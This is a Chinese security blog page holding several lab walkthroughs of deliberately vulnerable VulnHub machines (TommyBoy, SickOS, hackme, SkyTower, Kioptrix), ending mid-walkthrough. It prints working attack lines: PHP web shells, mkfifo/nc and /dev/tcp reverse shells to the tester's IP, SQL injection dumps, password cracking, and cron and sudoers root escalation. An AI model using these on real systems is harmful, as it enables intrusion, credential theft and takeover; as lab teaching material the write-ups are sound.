首页
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,420 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,053 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,218 阅读
4
几个常见的密码字典推荐
3,228 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,165 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
Windows渗透
域渗透
HackMyVm
CyberStrikeLab靶场
内网渗透
渗透测试
Web安全
网络安全
cyberstrikelab
OSCP
SQL注入
WAF绕过
信息收集
渗透工具
靶场
靶场推荐
MSF
ThinkPHP漏洞
Vulfocus
vulnhub
白小羽
累计撰写
184
篇文章
累计收到
0
条评论
首页
导航
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
搜索到
184
篇与
的结果
2025-05-18
超长攻击链vulhub靶机,TommyBoy1dot0
【oscp】超长攻击链vulhub靶机,TommyBoy1dot0靶机描述: 圣施耐克!汤米男孩需要您的帮助! 卡拉汉汽车公司终于进入了现代技术领域,并建立了一个Web服务器供其客户订购刹车片。 不幸的是,该站点刚刚瘫痪,唯一拥有管理员凭据的人是Tom Callahan Sr.-他刚刚去世!更糟糕的是,唯一一个了解服务器的人退出了! 您需要帮助Tom Jr.,Richard和Michelle再次恢复该网页。否则,卡拉汉汽车公司肯定会倒闭:-( ----谷歌翻译 目标:找到六个flag下载地址:https://www.vulnhub.com/entry/tommy-boy-1,157/主机发现arp-scan -l端口扫描(SYN),对应的服务端口为22,80,8080(服务阻止了我们访问,KEEP OUT,应该是内网才能访问的)nmap -sS 192.168.209.144 -p- -A -T4访问80端口目录扫描到的robots.txt文件前三个都是图片第四个是flag.txt,第一个flag找到了,B34rcl4ws找了很多地方都没有突破口了,看来只能从首页的源码找突破口了Nick的评论:备份副本在Big Tom的家目录中。 Richard的评论:你能也给我访问权限吗?只有Big Tom有密码。 Nick的评论:是的是的,我的处理器一次只能处理一个命令。 Richard的评论:请啦,我会好好请求的。 Nick的评论:我会给你设置管理员权限如果你告诉Tom不要再把重要信息存储在公司博客里。 Richard的评论:成交。公司博客地址是什么? Nick的评论:真的假的?你们这些家伙真是没救了。我们把它藏在一个以你们和Tom Jr.大打出手后注意到的地方命名的文件夹里。你知道的,就是你用木板砸他脑袋的那个地方。如果你不记得了,地址在这里:https://www.youtube.com/watch?v=VUxOd4CszJ8 Richard的评论:啊!我怎么忘了呢?谢谢。可以看到标题Hey Prehistoric Forest访问试试,数据库连接错误,一般目录不会存在空格,所以我们尝试 /PrehistoricForest /Prehistoricforest /prehistoricForest/prehistoricforest 四种写法,因为Linux是严格遵循大小写的,结果发现 /prehistoricforest 目录存在内容!而且是wordpress站点发现可能存在的用户6个,利用wpscan枚举用户信息,并利用msf中的top1024密码字典进行后台爆破wpscan --url http://10.10.10.192/prehistoricforest -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txttommy richard tom Tom Jr. Big Tom michelle密码没有找到嘞,giao,继续信息收集,wordpress版本为4.5.3版本漏洞检索(没有结果)那么只能手工注入了,SQL注入测试返回看第一篇文章,他说把站点目录切换到 /richard这下面有一个开车的少年下载下来后利用strings分析,包含了一段“xml”信息,有一个类似md5加密的密文识别这个hash,可以看到就是md5拿去解密https://www.somd5.com/,密码为:spanky第二篇文章,需要我们输入密码,我们试试刚刚解出来的 spanky密码正确的看到下面这一段话都总结一下吧1、只有tom(大汤姆)有登录的密码2、有一个 callahanbak.bak 的备份文件,需要你将其重命名为index.html3、有一个ftp服务,放在一个大多数扫描器都扫不到的端口上,每过15分钟上线4、nick重置了它的账号为,nickburns再翻一翻,到最后一篇文章的评论,有一个thisisthesecondflagyayyou.txt访问得到第二个flag,Z4l1nsky8008端口,有一个密匙nick的超级密匙sup3rl33t耐心等待一会儿,出现了一个65534端口目前已知的密码,就是刚刚的md5还有8008的密匙,还有flag,每个都尝试一下,发现密码是同样用户名一样的,都是nick重置后的用户名将这个readme下载下来get readme.txt大致就是告诉我们服务器上有一个子文件夹NickIzL33t,还有一个encrypted.zip文件他还说要通过手机访问,那么是不是要添加一个ua头呢?打开hackbar添加ua头(iphone)如下Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default需要利用html后缀来攻破这个壁垒,利用目录扫描工具dirb和dirsearch,均没有任何东西dirb http://10.10.10.192:8008/NickIzL33t/ -H 'User-Agent:Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default' dirsearch -u http://10.10.10.192:8008/NickIzL33t -H 'User-Agent:Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default'那么就利用wfuzz模糊测试工具,指定一个小型的字典以 fall 开头的字典,节省时间,实际情况我们是不清楚这个是以 fall 开头的cat /usr/share/wordlists/rockyou.txt| grep fall > small_rockyou.txt wfuzz -u http://10.10.10.192:8008/NickIzL33t/FUZZ.html -w small_rockyou.txt -H 'User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS........... .8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default' --sc 200成功扫描出来了一个html第一个链接第二个链接,找到第三个flag,TinyHead第三个链接是一个zip文件,看样子需要我们根据第一个链接的提示猜测密码原文翻译如下大汤姆,你的密码库是用(是的,你猜对了)密码保护的! 因为你选择了像“passwordi23”和“brakepad”这样愚蠢的密码,我强制要求你使用新的密码。 13个字符,宝贝! MUAHAHAHAHAH ! ! 你的密码是 你妻子的昵称“bev”(注意全是小写的)加上以下内容: 一个大写字符, 两个数字, 两个小写字符, 一个符号 Tommy Boy 在剧院上映的年份 是的,胖子,要按的键很多,但要确保你把它们都打在一个大块上,好吗? 嘿,“大块”。 大块输入大块。 这是有趣的。固定的信息找到了两个,devxxxxxx1995那么使用kali下载下来(记得添加ua头)wget http://10.10.10.192:8008/NickIzL33t/t0msp4ssw0rdz.zip --header='User-Agent:Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default'接下来利用已知的密码信息,来生成密码字典crunch 13 13 -t bev,%%@@^1995 > pass.txt命令解释:13 13 : 表示生成13个字符,如果是 7 13那么就代表从7位数开始生成,一直生成到13位数完,也就是(7-13个字符)-t : template的缩写,表示使用模板(模式)来生成密码。bev,%%@@^1995 : 模板字符串含义如下 , 表示包含任意一个大写字母(A-Z) % 表示包含任意一个数字(0-9) ^ 表示特殊字符 @ 表示任意的小写字母(a-z) 查看具体代表的字符,可以这样使用,只是用一个符号来利用crunch 1 1 -t , # 输出结果 A B C D … … Y Z并利用这个字典进行爆破fcrackzip -D -p pass.txt -u t0msp4ssw0rdz.zip找到了zip的密码 bevH00tr$1995unzip t0msp4ssw0rdz.zip cat passwords.txt这里有三个用户和密码信息(ssh鉴权失败),只能从网页上走了,但是3个用户都是失败的BigTommyC : money TomC : wedding bigtommysenior : fatguyinalittlecoat那么对密码字典进行一下赛选吧,那么多的大汤姆,就以tom进行赛选cat /usr/share/wordlists/rockyou.txt| grep tom > tom_rockyou.txt wpscan --url http://10.10.10.192/prehistoricforest -e u -P tom_rockyou.txt此时就爆破成功了一个密码tom / tomtom1,登录进去就行了这里有人告诉我们后门遗忘的数字是 1938!! 所以我们将字符拼接到上面密码上,得到账号密码我们利用这个新的到的账号密码再次尝试ssh登入用户:bigtommysenior 密码:fatguyinalittlecoat1938!!登录成功了,找到第四个flag,EditButton,并且提示我们第五个flag在 /5.txt中www-data用户,那么思路就是要么直接提权到root用户,要么直接切换到www-data用户,再就是直接在网站中写入一个php马系统信息收集,看看能不能直接内核提权其他的一些信息收集uname -a cat /etc/os-release # 没有lsb_release -a命令可以使用这个代替 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息 ps -aux | grep mysql # 查看mysql是否在后台运行 netstat -tuln # 查看端口信息当前目录下有一个zip文件需要我们解密,看向旁边有一个callahanbak.bak文件,这个不就是文章中所说的备份文件嘛,需要让我们修改成index.html就可以恢复正常貌似没什么东西啊转过来网站的配置文件,看到账号密码信息wordpressuser CaptainLimpWrist!!!四个账号密码信息richard : $P$BzW7ZDwxd7THv1D4rTANjGGgzV0XK9/ tommy : $P$BCcKbJIQtLuiBOybaQPkkfe1yYJRkn. michelle : $P$BIEfXY1Li5aYTokSsi7pBgh0FTlO6k/ tom : $P$BmXAz/a8CaPZDNTraFb/g6kZeTpijK. # 全部解密失败,得不到明文信息了没有利用的了,这个时候看看能不能在网站目录下面写一个木马了find / -name 'NickIzL33t' 2>/dev/null cd /var/thatsg0nnaleaveamark/NickIzL33t看到这个目录下面有一个当前用户可以写的目录写入一句话木马cd uploads/ echo "<?php @eval($_GET[pass]);?>" > cmd.php # 之后你可能会发现站点报内部错误,大概率是php禁用了eval函数 # 替换system就可以了 echo "<?php system($_GET[pass]);?>" > cmd.php下载这个内容.5.txt文件,找到第五个flag :Buttcrack,最后一句话是说,对着所有的flag进行操作组合,即可解开loot.zip文件wget 'http://10.10.10.192:8008/NickIzL33t/P4TCH_4D4MS/uploads/cmd.php?pass=cat%20/.5.txt' --header="User-Agent:Mozilla/5.0 (iPhone; CPU iP hone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default" root@kali:/data/exp/demo# cat 'cmd.php?pass=cat %2F.5.txt' FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!! OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!! Flag data: Buttcrack Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk. So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you" you would create this blob: hithereyou Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's folder and you can call the box PWNED.第一个flag:B34rcl4ws第二个flag:Z4l1nsky第三个flag:TinyHead第四个flag:EditButton第五个flag:Buttcrack组合:B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack,这个时候就能找到最后一个内容flag啦(并没有提权奥,目标就是找到6个flag)至此已经全部做完啦,oscp+认证之路,我们会一直陪着您,加油!思路总结1、通过端口扫描出来的信息,发现22和80还有8008端口的服务,其中80和8008端口是http服务,可以通过网页访问2、然后通过80端口目录扫描出来的robots.txt文件,找到第一个flag3、通过访问页面的源码和提示信息,开魔法访问网站,有一个标题,或者评论区找到信息,进行拼凑名称,最终发现一个prehistoricforest目录,这个目录呢是一个wordpress站点4、通过阅读wordpress站点的文章,找到第二个flag,获取一个压缩文件,并且会告诉你这个压缩文件的一些密码提示5、通过这些提示,用密码生成工具crunch生成可能的用户密码,进行爆破,找到第3个flag6、第四个flag需要使用wpscan对wordpress站点进行爆破和用户枚举,登录到后台后,就能获得遗漏的密码提示(缺少的后缀信息),然后就能登录ssh获取第4个flag7、第五个flag在第四个flag的提示中,在系统的根目录下面有一个.5.txt隐藏的txt文件,会发现他是www-data用户8、通过对数据库密码进行一系列的猜测,最后发现一个uploads文件夹当前低权限用户可以写文件,此时写入一句话木马,并且这个一句话木马不能包含@eval,否则会内部错误,你访问不了网站,写入这个一句话马后就能获取到第五个flag9、根据第五个flag的提示,将五个flag组合就是当前用户下的那个zip文件的密码,解压后,获取到最终flag。往期推荐【oscp】pWnOS系列全教程,Webmin文件披露,Simple PHP Blog渗透教程【oscp】SickOS系列全教程【oscp】tar、zip命令提权—zico2【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结渗透测试中新手必练的15个靶场从零开始学SQL注入(sql十大注入类型):技术解析与实战演练
2025年05月18日
1,348 阅读
0 评论
0 点赞
2025-05-18
vulnhub提权靶机SickOS系列
SickOS系列SickOS1.1靶机下载链接见:https://download.vulnhub.com/sickos/sick0s1.1.7z靶机渗透,主机发现arp-scan -l端口扫描,80端口是没有开启的,3128端口有一个http服务访问查看,这个服务呢是一个http代理,版本是3.1.19,8080端口也是一个http代理,但是已经关闭了既然是代理服务,那么我们进行目录扫描的时候,需要添加上这个代理ip+端口,不然扫不到80端口(80端口没有开启的)我们使用靶机的代理,这样就能扫描出来了,但是没有扫到后台管理的地址呢并没有该系统的后台管理地址浏览器添加代理访问成功,可以进一步信息收集了robots文件这个文件不知道是什么,先放着这就是wolfcms内容了漏洞检索一个一个看,直到第三个漏洞描述访问,原来是多了一个问号啊弱口令admin/admin(也可以进行爆破,毕竟没有验证码)上传一句话木马添加代理保存后即可连接成功反弹shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.209.130 6666 >/tmp/f创建交互式终端python -c 'import pty; pty.spawn("/bin/bash")'得到mysql数据库账号密码root / john@123登录进去,用户表只有一个用户admin继续信息收集,回家,历史命令,SUID文件计划任务ls -al /etc/cron*这些工具基本上都没啥用,这里需要用上之前的数据库密码,来登录这个home下面的用户sickos有了密码那么就直接sudo,可以看到是所有的东西都可以执行sudo,那么就简单了直接 sudo -s 保存用户变量,切换超级用户root,也可使用sudo -i使用root的环境变量SickOS1.2靶机下载链接见:https://www.vulnhub.com/entry/sickos-12,144/端口扫描,目标服务器开启了22端口和80端口访问80端口第一时间查看源码,在最下面<!-- NOTHING IN HERE ///\ -->目录扫描有一个指纹信息漏洞检索,并没有相关版本的漏洞将网页上的图片下载下来使用strings进行分析网上搜到一种方法Nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.209.133该命令使用Nmap的http-methods脚本检测IP为192.168.209.133的主机上Web服务的/test路径支持的HTTP方法。利用这个PUT方法,可以上传文件至目标服务器,HTTP的请求方式常见的就是GET、POST、DELETE、PUT其中PUT方法,向服务器上传一个资源,用于创建或完全替换目标资源的内容。如果资源不存在,则创建该资源;如果资源已存在,则进行更新。DELETE:请求服务器删除由URL所标识的资源。那么我们尝试上传一个php文件,响应结果为创建成功<?php @eval($_POST[hack]);?>这时候回到页面,就会发现一个新的php文件蚁剑i连接这里反弹shell试了好多种方式,都不行,看样子是对端口进行了限制,先信息收集吧,用户信息系统信息收集uname -a lsb_release -a查找某一个用户的文件find / -user john -type f 2>/dev/null这里需要一个脚本,检查端口得开启情况(不是已使用的服务),默认使用iptables,但是没有权限这里需要用上一个脚本来检查端口的开放情况,脚本内容如下# !/bin/bash for i in $(seq 1 65535) do timeout 1 nc -vz 192.168.209.130 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt; done echo "all port done"放到kali中,并开启http服务,并将所有端口的流量都转发到34444端口python -m http.server 5000 //备份iptables规则 iptables-save > /tmp/firewall.rules //将所有端口的流量都转发到34444端口 iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 34444 //监听34444端口 nc -lvp 34444尝试从kali上下载这个文件,下载失败切换tmp进行下载还是失败那么就麻烦一点,传到本机上,再传到靶机这样就能上传成功了执行脚本会生成一个txt文件这里需要多执行几次,否则都是关闭的状态,检测不到结果kali回显了,说明443端口是放行的用bash反弹shell(如果反弹不成功,需要清除 iptables 的所有规则)bash -c 'bash -i >& /dev/tcp/192.168.209.130/443 0>&1'创建一个交互式终端python -c 'import pty; pty.spawn("/bin/bash")'信息收集,我是谁?我在哪?你是谁?漏洞检索,没有任何的漏洞信息,3.11.0不在这里面的库中查看有没有gcc编译命令这里利用cve-2021-4034提权poc打,注意kali开启的端口要是443提权失败,找其他信息(前面我们已经搜索了一些信息了,这里直接打)这里是要用到一个命令ls -al /etc/cron*这个命令就是说查看所有和计划任务有关的所有内容,发现了一个计划任务,chkrootkit命令其中/etc/crontab:这是系统的crontab文件,用于定义系统级别的定时任务。/etc/cron.d:该目录用于存放系统级别的定时任务配置文件。/etc/cron.daily :这些脚本用于执行每天需要进行的系统维护任务,如更新软件包列表、清理日志文件、更新数据库等。/etc/cron.hourly :这些脚本用于执行每小时需要进行的系统维护任务,如清理临时文件、更新缓存等。/etc/cron.monthly : 这些脚本用于执行每月需要进行的系统维护任务,如备份、报告生成等。/etc/cron.weekly :包含多个脚本文件,这些脚本每周执行一次。找到漏洞We just found a serious vulnerability in the chkrootkit package, which may allow local attackers to gain root access to a box in certain configurations (/tmp not mounted noexec). # 我们刚刚在chkrootkit包中发现了一个严重的漏洞,它可能允许本地攻击者在某些配置(/tmp而不是挂载noexec)下获得root访问权限。查看利用步骤大致意思就是说让我们在tmp目录下面创建一个文件叫做 update ,这个update文件呢包含了一些恶意脚本,当我们运行chkrootkit这个工具的时候,这些恶意脚本也会跟着执行,并且是以root身份执行的(它是计划任务,会定时执行)这里可以利用sudo提权,,将当前用户赋予sudo权限echo 'echo "www-data ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >/tmp/update chmod +x /tmp/update也可以向 /etc/passwd 追加一个用户,密码为 password@123 (使用openssl将这个密码加盐,不加也可以,得到结果advwtv/9yU5yQ,所以完整的命令如下)echo 'echo "xiaoyu:advwtv/9yU5yQ:0:0:,,,:/root:/bin/bash" >>/etc/passwd' >/tmp/update再者利用nc反弹shell(有思路就可以,这里没有成功)echo '/bin/bash -i >& /dev/tcp/192.168.209.130/443 0>&1' > /tmp/update如果有错误还请师傅们指正往期推荐111
2025年05月18日
1,900 阅读
0 评论
0 点赞
2025-05-18
vulnhub靶机hackme
主机发现和80探测端口扫描目录扫描,访问这个图片看看没东西了,就登录试试万能密码注册一个用户去登录后,那个重置密码的url没有用了,旁边那个链接就是退出登录直接进入的时候是没有任何结果的,要先点一下search按钮搜索关键字,OSCP能直接查出结果了,存在sql注入漏洞,需要注意的是万能密码地方的空格(qwq前面的空格很重要)OSCP' or 1=1 -- qwq判断列数OSCP' or 1=1 order by 3 -- qwq联合查询OSCP' union select 1,2,3 -- qwq当前数据库OSCP' union select database(),2,3 -- qwq # webapphacking暴数据库OSCP' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq # information_schema,mysql,performance_schema,sys,webapphacking暴当前数据库的表OSCP' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq # books,usersusers表的列(字段)OSCP' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq # id,user,pasword,name,address暴表数据OSCP' union select group_concat(user,'-',pasword),2,3 from users -- qwq # user1-5d41402abc4b2a76b9719d911017c592 hello # user2-6269c4f71a55b24bad0f0267d9be5508 commando # user3-0f359740bd1cda994f8b55330c86d845 p@ssw0rd # test-05a671c66aefea124cc08b76ea6d30bb testtest # superadmin-2386acb2cf356944177746fc92523983 Uncrackable # test1-05a671c66aefea124cc08b76ea6d30bb testtest # 下面两个是新加的 # xiaoyu-348f10f863b27ec106195c96e23dcd91 xiaoyu # admin-e10adc3949ba59abbe56e057f20f883e 123456有了密码,ssh试试全都失败登录账号 superadmin 有一个文件上传上传一个一句话木马shell.php<?php @eval($_POST['cmd']);?>蚂蚁连接这里的nc没有-e参数,所以用如下命令进行反弹 shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f反弹成功创建交互式终端python3 -c 'import pty; pty.spawn("/bin/bash");'系统信息收集切换到home文件夹下面,意外发现一个suid文件执行文件,即可提权成功往期推荐【OSCP】Blender软件的信息泄露---VulnOSv2【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
2025年05月18日
2,027 阅读
0 评论
0 点赞
2025-05-18
Sudo的上级目录提权,SkyTower
Sudo的上级目录提权,SkyTower主机发现80探测端口扫描目录扫描,没有任何可以利用的信息admin' and 1=1 --+sql注入语法错误,存在sql注入漏洞万能密码没有用(admin' or 1=1 --+),发现对or,and,-- ,=进行了过滤,只剩下了这些号测试,没有过滤那么还有一种写法,就是|| 用这个代替or登录成功得到了ssh的账号密码,john / hereisjohn但是前面我们的22ssh端口是关闭的,该怎么办呢?3128这个端口呢是一个代理的端口,所以我们用如下代理进行连接ssh这里我们要用到一个叫代理跳转,现在我们设置一下代理proxytunnel -a 6666 -p 192.168.111.154:3128 -d 192.168.111.154:22新建一个终端,,连接本地的6666端口,这时候就成功连接了代理的ssh,但是自动断开了ssh john@127.0.0.1 -p 6666这里尝试执行命令,成功,但是会自动断开连接反弹shell试试查看当前登录的配置文件ssh john@127.0.0.1 -p 6666 -t "cat .bashrc"删除最后一行,还是不行哈,还是有这个东西(exit)ssh john@127.0.0.1 -p 6666 -t "sed -i '$d' .bashrc"那么就全部复制到一个文件里面,在kali中把原来的删了,再使用wget下载这时候再登录,就成功了内网信息收集sudo,SUID没有思路了就去网站的根目录,看源码并且进程中还有一个mysqlroot/root,登录mysql三个用户的邮箱和密码都知道了mysql> select * from login; +----+---------------------+--------------+ | id | email | password | +----+---------------------+--------------+ | 1 | john@skytech.com | hereisjohn | | 2 | sara@skytech.com | ihatethisjob | | 3 | william@skytech.com | senseable | +----+---------------------+--------------+我们切换用户sara,Funds have been withdrawn,资金已被撤回william用户鉴权失败登录看看,还是要ssh登录哈和刚刚一模一样从kali中下载这个bash文件登录成功sudo能用那么久利用它的accounts目录,进行提权,查看shadow密码文件,这东西肯定加了盐的,很难破解出来$6$rKYhh57q$AVs1wNVSbE5K.IU1Wp9l7Ndg3iPlB7yczctQD6OL9fBZir2ppGDA6v0Vx17xjg.b3zu6mkAVpEN2BuG3wvS2l/这时候可以直接用sudo查看flag提权成功!往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年05月18日
1,888 阅读
0 评论
0 点赞
2025-05-18
Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!emmm 什么是OSCP?是由OffSec公司提供的一个专业级别的道德黑客认证。它是针对渗透测试的专业认证,旨在验证个人在实际环境中进行渗透测试的能力。与其他理论导向的认证不同,OSCP侧重于实践技能和真实世界情景的模拟。它也叫做国际进攻性安全认证,如果有想要报考OSCP的师傅们欢迎咨询我们安全团队,我们给您打骨折。本次教程靶机如下,都准备好了,直接下载就好,并且解决了官方靶机扫描不到的问题:链接:https://pan.quark.cn/s/475209fc0c05level 1主机发现上一步没有加-sV参数,这里加上之后的信息看看80有什么随便点点啥也没有,有个METGT2.9.5不知道能不能用得上再点点有个php文件,啥用没有不管啥服务都搜一搜利用这个poc,有版本区间了,用用第二个用户名枚举的poc发现是用得python2pip也不存在,看样子用不了了,我们换一个mod_ssl 刚刚使用nmap -sV参数扫出来的版本信息,还有谷歌插件wapplayer信息收集插件,都能看到这个mod_ssl使用第一个exp,这里看到有提示信息按照他的提示信息,我敲,这谁顶得住啊,这提示信息,看不懂,跳过,直接下载,艹复制下载链接,可以发现这个单词变成了download 下载的意思,直接下载刚刚searchsploit 的 exp文件换一个,卧槽这谁顶得住啊官方编译好的都执行不了,等我换个kali。。。。。24小时后。。。。。卧槽还是不行等我仔细看看exp报错信息,他说的是 } 附近语法错误,看不懂代码,用本地exp重新编译,报了这个错误,似乎是要加上这一个参数加上后还是报错,openssl版本问题,这是一个已经弃用的(deprecated)函数,百度了一下,需要使用-Wno-deprecated-declarations参数,就是前面的那个-Wdeprecated变成 -Wno-deprecated所以完整的参数是这样的,这样就能够成功编译了,命令如下gcc -o exp 47080.c -lcrypto -lssl -Wno-deprecated-declarations执行exp,他会告诉你怎么使用,以及每个参数的用法,英文好一点的就可以直接看,不好也没关系,翻译软件2s钟的事儿wapplyer插件,看web服务器版本使用exp会告诉你怎么使用,看着后面的apache,这个时候进行筛选就行了遇到这种good bye的那么就是利用失败,一个一个尝试就好了直到参数如下,成功获取到了shell,并且有一串提示信息貌似是执行过这几条命令,做一次历史命令信息收集,history,但是发现切换到tmp目录下面的时候什么也没有,看样子是没有下载文件尝试下载,但是下载失败了既然不能下载,那么我们使用kali下载,然后再传到靶机上面去利用kali下载文件后,使用python开启http服务可以看到下载成功根据之前的命令提示,按着顺序输入命令,进行编译后,就会断开连接重新连接,他就会自动执行刚刚编译好的exp文件这个时候就提权成功了,为什么会自动执行那个exp?查看源码就可以发现了samba提权这里是一种提权方法,还有另外一种smb提权,OSCP考试是不允许使用MSF的(只有一次机会),我找了很多kali自带的工具,都识别不到smb版本无奈,只能使用MSF了,识别出来了版本为 2.2.1a这里找到一个版本,第二个,因为第一个是MSF版本,我们需要手工利用exp编译,执行提权成功level 2主机探测syn全端口扫描nmap -sS -T5 192.168.111.184 -A使用curl访问80,可以看到是html信息弱口令,sql注入测试失败mysql远程连接,也失败了,提示了目标mysql服务器没有开启远程连接dirb目录扫描出来一个html页面,不知道是干什么的,不过看样子应该是和apache相关的信息文件使用wappalyzer插件,查看一些中间件服务版本和nmap指纹探测一波找找版本exp,目前收集到的信息,不能确认exp,唯一能能确定的就是那个拒绝服务攻击,但是对我们没什么用这里看到一个本地提权,待会应该能用上,先记着编号是 7550759端口信息不够,直接跳过,但是目前也没有什么可以利用的了,再返回登录框看看,再试试sql注入,注意这次的sql注入和我之前的sql注入是有区别的# 之前的 admin' and 1=1 --+ # 现在的(+号前面多了个空格) admin' and 1=1 -- + 万能密码成功其实也算不上是万能密码,我这样也能进去,只要打乱了sql语句就行了进去index.php后查看源码信息,哎呀卧槽,这里还有隐藏的代码,分析表单看样子是要执行一个ping命令,并且传参给pingit.php还是post请求那么就能得到这个接口请求的payload看样子是一个命令执行,但是尝试了如下反弹shell后,都没有反应ip=127.0.0.1 && /bin/bash -i >& /dev/tcp/192.168.111.128/8888 0>&1 nc 192.168.111.128 8888 -e /bin/bash试试whoami,我敲,看样子被耍了,这根本不是命令执行啊再看看源码有一个Administrator,可能也是一个有用的信息这里还有一种方法,就是新加一个页面在浏览器中以 html格式修改,把它原来的源码复制上去加上缺少的单引号回车,这样它的input框就出来了尝试127.0.0.1,这下有回显了,刚刚怎么没有?from.submit is not a fun,这个的大致意思呢就是,表单无效,hackbar模拟提交表单的时候,没有处罚javascript的表单提交的方法,那就是编码类型不对了因此切换表单提交的编码类型需要修改一下,这样就可以正常执行了这里执行命令的时候会发现,我使用一个 | 管道符,不管前面的命令是否执行成功,都只执行后面的那一条语句但是bash反弹shell的时候,是失败的,因为这个&和提交的表单数据冲突了需要修改为 %7C 为 | 的,但是这样很麻烦,换一种方法,直接在源页面写不更好嘛?在原来的页面写命令,这样会给我们的http post数据包自动编码反弹成功信息收集找到个这个根据提示加了-Wno-int-to-pointer-cast参数后,提示了很多的无效的指令(invalid instruction)切换思路,继续信息收集,使用lsb_release -a命令查看系统信息,可以看到是比较老的 centos 版本,存在很多漏洞漏洞检索,centos 4.5kali编译失败传到靶机试试(注意kali开启http服务)提权成功之前我们提到过一个服务的提权编号是7550,这里去尝试尝试查看源码,貌似却少一个文件,但是使用方法就是那样使用的,可以判断当前系统不存在此服务漏洞level 3主机发现,80探测节省时间,nmap放在后台扫描新建终端,dirb也放在后台扫描我们访问80端口wapplalyzer随便点点,这个页面,感觉没发现什么盲测sql注入bolg界面的框框xss字典攻击,失败这个时候nmap和dirb都扫完了,回去看看有一个phpmyadmin,弱口令 root/root弱口令爆破,全都是302跳转简单sql万能密码测试这里把密码清空,万能密码直接进去了并且可以写文件,这个为空就代表可以写文件show global variables like "secure%";网站根目录猜测为 /var/www/html写入文件测试,拒绝访问,没有使用密码切换方式,继续信息收集,刚刚目录扫描出来的一个登录框框检索漏洞,这里有一个命令执行漏洞,要用到MSF,再想想其他办法,考试只有一次机会github查找使用git clone 下来执行这个sh文件根据提示输入参数开启交互式终端信息收集/etc/passwd权限信息检索漏洞kali编译不了,我们传到靶机上试试提权失败又仔细看了看这个是小于号,不是小于等于用第一个试试,还是失败重新筛选一下,searchsploit 2.6.2 不使用2.6.24提权失败查找一下suid文件,看看能不能利用suid提权,好像并不行去home目录下面看看,loneferret用户文件夹下有一个 CompanyPolicy.README 文件,不知道是什么东西,打开看看,有个sudo -iHello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO 大致意思就是 您好新员工 这里的公司政策是使用我们新安装的软件来编辑、创建和查看文件。 请使用命令'sudo ht'。 不这样做将导致您立即终止。 DG 首席执行官我们再回到那个图片加载不出来的页面,想到可能是因为host问题,随便点一个链接,会发现ip跳转到 kioptrix3.com 这个域名,大概率是域名的问题,需要去host添加域名解析的 ipC:WindowsSystem32driversetchost这个时候再访问这个域名,页面就正常了再来测一测sql注入点这个试试选择id又有注入点了sql注入测试,sql语法错误,存在sql注入判断列数6列正常回显http://kioptrix3.com/gallery/gallery.php?id=1 order by 6-- +&sort=photoid#photos暴表http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(table_name),3,4,5,6 from 